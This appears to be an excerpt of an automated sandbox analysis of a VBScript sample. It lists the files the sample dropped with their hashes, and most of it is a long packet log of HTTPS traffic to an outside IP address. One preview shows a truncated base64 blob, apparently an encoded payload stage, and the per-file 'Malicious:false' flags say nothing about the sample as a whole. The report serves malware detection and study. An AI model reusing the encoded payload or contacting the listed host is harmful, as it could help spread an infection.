                                    SHA-512:BCEE124A17843CEF5EB075DB45FECDB7A1B00D9D9D7BA1076219280C58A0FFC7CA4CB61802343F29519D5C3A1CBB32E21CB00759F3E08E4D28B2A37DE43117BA
                                    Malicious:false
                                    Preview:.~.....................................;...{..,....}.......{}..............{}......{}.vv_Q.....{}.................vK.4,....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):8003
                                    Entropy (8bit):4.840877972214509
                                    Encrypted:false
                                    SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                    MD5:106D01F562D751E62B702803895E93E0
                                    SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                    SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                    SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                    Malicious:false
                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:NlllulJnp/p:NllU
                                    MD5:BC6DB77EB243BF62DC31267706650173
                                    SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                    SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                    SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                    Malicious:false
                                    Preview:@...e.................................X..............@..........

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3bcuc2li.ysb.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fv1cylqm.nuw.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwsl2t3s.5hg.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rt4on5nb.lj2.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Roaming\Motorgadens.Alb

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):643188
                                    Entropy (8bit):5.942960699479941
                                    Encrypted:false
                                    SSDEEP:12288:FcjIlyuktF9USUIBbfBiHdtZ7kN/igL0voHds70j+40tRCrf8:eMUFwBIPi9DkN6BvoH2JL
                                    MD5:3AC75E8B652807F6AFB45E2180BE437B
                                    SHA1:F303B3F845D15A3A59B2C7811A966DDA8ACDD9BC
                                    SHA-256:29E815DC846277FE7158374D957E4F765E6041BF410CD4FE161472C0B38A57B0
                                    SHA-512:36B3187BE752206E69E28DC6B4384FA45815D6BE6B4AF74A4E56461720B80223A79E1CFF0895D344CBD9CA98A0B16BC425E3D83B31F6B59FEDACDD500EF78984
                                    Malicious:false
                                    Preview:ZoPqALu+fBwA2dADXCQEm7k/SVRXgekNnF9PgfEyrfQHg/MAuo1hS4rZ0GYhwDHKIMmJFAuDwwDR4maD8wCDwQTZ0IH5AmbTA3zgi0QkBGYhwInDZoPJAIHDyPzxAIH76BTLZ7qSvy7ugfInofW8gfK1HttSZoPHACDSiwwQgMkAiQwTZsHvAEIhyYH6sOIGAHXmweMAiVwkDPyB7QADAACDygCLVCQIgPEAi3wkBIPrAInrwOsAgcOcAAAAIMBTZiH2akBmPUzHiev8x4MAAQAAAPDyA2aDzgCBwwABAABmhf9Tg/cAiev8ibsEAQAAm4HDBAEAAGaB+/Q1U2bB4gBq/2aD7wCDwgVmhcAx9tnQMclmgf6BJYsagPuiQWYhyTkcCnX3g/YARoTJgHwK+7h16iDbi0QK/ITAKfAEAP/Sg+8AurDiBgDA6QAxwGaF/4t8JAxmg8MAgTQHbTDbV4PLAIPABAwAOdB17SHSifub/9fA4QAzCQMBhiiDPdBEObjElp5JuniDPdBEObjElp5JungzPrg22zGa9/a8qzCAr7X/vaCquqTXRWswXhCtXlhGIO4JWz8lrAuxIDqWcCduq0UCv24w21cLCRO8ZA99nkizHuV2KIDTt7k+3tg9JKiSjl+PrisDmuzeX4KuK71Yssjyo+aF1qiSzyMC5NViMwVQfG6m28JHuoHgfpSc2kuSArjklsU9vW+r7+/i7hr/YlcdMZrxarjswac/DZcwbxKDmN6mfQmfeGLNJLNgAsgZpCuWPKD/9dI9a8ISg5jepn0Jn3hizSSzYALIGaQrljyg//XSPWvCCz8ymlX6J5ApPdt9dq9wbqw/uJOVsa9abRrAyMa0CVgJ4jBaymxIMWGLZFtexEmLHWdkR/TN+tSSa9TZjPLdVzL3XkpvMNu3VBQer1XfArKGGC+RCqa6zdH13inc6vl3UhQyZ8ay9sCp1PCa4992xQWA/AjAw71gzXBa0nAy21dO9gBt

                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):55
                                    Entropy (8bit):4.306461250274409
                                    Encrypted:false
                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                    Malicious:false
                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                    Static File Info

                                    General

                                    File type:ASCII text, with CRLF line terminators
                                    Entropy (8bit):5.192553684212169
                                    TrID:
                                    • Visual Basic Script (13500/0) 100.00%
                                    File name:Blikvarefabrikken.vbs
                                    File size:19'009 bytes
                                    MD5:b7d8d9cb6cffa5ae6ecb12d0b1a85b27
                                    SHA1:cbdc3d17f572bec63e07a1a734ae80b4b3f09adb
                                    SHA256:327a98bd948262a10e37e7d0692c95e30ba41ace15fe01d8e614a9813ad9d5cf
                                    SHA512:e4ff60ad78450ae1fd87903a780db12a96c77ca6620a2bb7252559b2840628b28678a3986a1d27e90155f37c7c2ea9702feff68f8c7a107f7b31a9047ba0cc46
                                    SSDEEP:192:6TSTc9d2m/kcyO2mqn8xOlMUpyot033zVT2FESWwK9AfiBQZz1eT9N/dtyleTRW0:Qnom/0IOlyo2zVy2jAmN/dXcG5
                                    TLSH:2C8272B2D569E335CF465E945F56050341E06A366CB198B56EFF43CCB022D88F22AF8A
                                    File Content Preview:....Uholdbarcelleker = FormatCurrency(2694606)....Dim Turkmenian....Forureningssagerne = Evadne ....'Tabriz? fedesvinenes117?..Do ..'hjpasfilter fdsler rejsegodsforsikring? autoktone, rendyrkninger....Opbruddene = Now....Slagvoluminetirr = Now....'preimmu

                                    File Icon

                                    Icon Hash:68d69b8f86ab9a86

                                    Network Behavior

                                    Download Network PCAP: filteredfull

                                    Network Port Distribution

                                    • Total Packets: 107
                                    • 443 (HTTPS)
                                    • 53 (DNS)
                                    TimestampSource PortDest PortSource IPDest IP
                                    Apr 8, 2025 08:12:28.370841026 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:28.370879889 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:28.371030092 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:28.379060030 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:28.379077911 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:28.986186981 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:28.986264944 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:29.000952959 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:29.000989914 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:29.001315117 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:29.009844065 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:29.052273035 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:29.876262903 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:29.876290083 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:29.876303911 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:29.876513004 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:29.876529932 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:29.876620054 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:29.924750090 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:29.924774885 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:29.924904108 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:29.924922943 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:29.974936962 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.175232887 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.175261974 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.175540924 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.175560951 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.175604105 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.176593065 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.176610947 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.176682949 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.176691055 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.176779985 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.226012945 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.226038933 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.226119041 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.226139069 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.226175070 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.473412991 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.473433018 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.473552942 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.473570108 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.473690987 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.474009037 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.474025011 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.474092960 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.474102020 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.474147081 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.475085974 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.475109100 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.475184917 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.475193024 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.475239992 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.476883888 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.476902008 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.477001905 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.477014065 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.477056980 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.478101015 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.478116035 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.478185892 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.478197098 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.478251934 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.526705980 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.526731968 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.526868105 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.526885033 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.526949883 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.774704933 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.774735928 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.774779081 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.774801970 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.774827957 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.774852037 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.775957108 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.775978088 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.776009083 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.776014090 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.776036024 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.776082993 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.778057098 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.778079033 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.778122902 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.778127909 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.778147936 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.778187037 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.780543089 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.780570030 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.780601978 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.780610085 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.780633926 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.780668974 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.782519102 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.782543898 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.782599926 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.782599926 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.782608032 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.782692909 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.784554958 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.784578085 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.784650087 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.784650087 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.784658909 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.784698009 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.786109924 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.786133051 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.786180973 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.786180973 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.786187887 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.786259890 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.788904905 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.788925886 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.789016008 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.789016008 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.789046049 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.789139986 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.790702105 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.790731907 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.790765047 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.790771961 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.790817022 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.790817022 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.791459084 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.791482925 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.791654110 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.791662931 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.791724920 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.827667952 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.827704906 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.827768087 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.827768087 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.827780962 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.827820063 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.829370022 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.829394102 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.829427958 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.829435110 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:30.829457998 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:30.829507113 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.370645046 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.370659113 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.370698929 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.370728016 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.370748997 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.370764017 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.370769978 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.370798111 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.370800972 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.370807886 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.370826006 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.370846987 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.370872021 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.370891094 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.370906115 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.370913029 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.370929003 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.370954990 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.370971918 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.370971918 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.370973110 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.370986938 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371010065 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371031046 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371051073 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371068954 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371115923 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371121883 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371130943 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371146917 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371166945 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371170044 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371179104 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371201038 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371238947 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371246099 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371253014 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371269941 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371299982 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371305943 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371315956 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371330023 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371352911 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371360064 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371375084 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371388912 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371419907 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371432066 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371454954 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371496916 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371501923 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371510983 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371510983 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371532917 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371536016 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371542931 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371567965 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371597052 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371611118 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371629000 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371681929 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371696949 CEST49683443192.168.2.9146.88.26.238
                                    Apr 8, 2025 08:12:31.371704102 CEST44349683146.88.26.238192.168.2.9
                                    Apr 8, 2025 08:12:31.371737957 CEST49683443192.168.2.9146.88.26.238
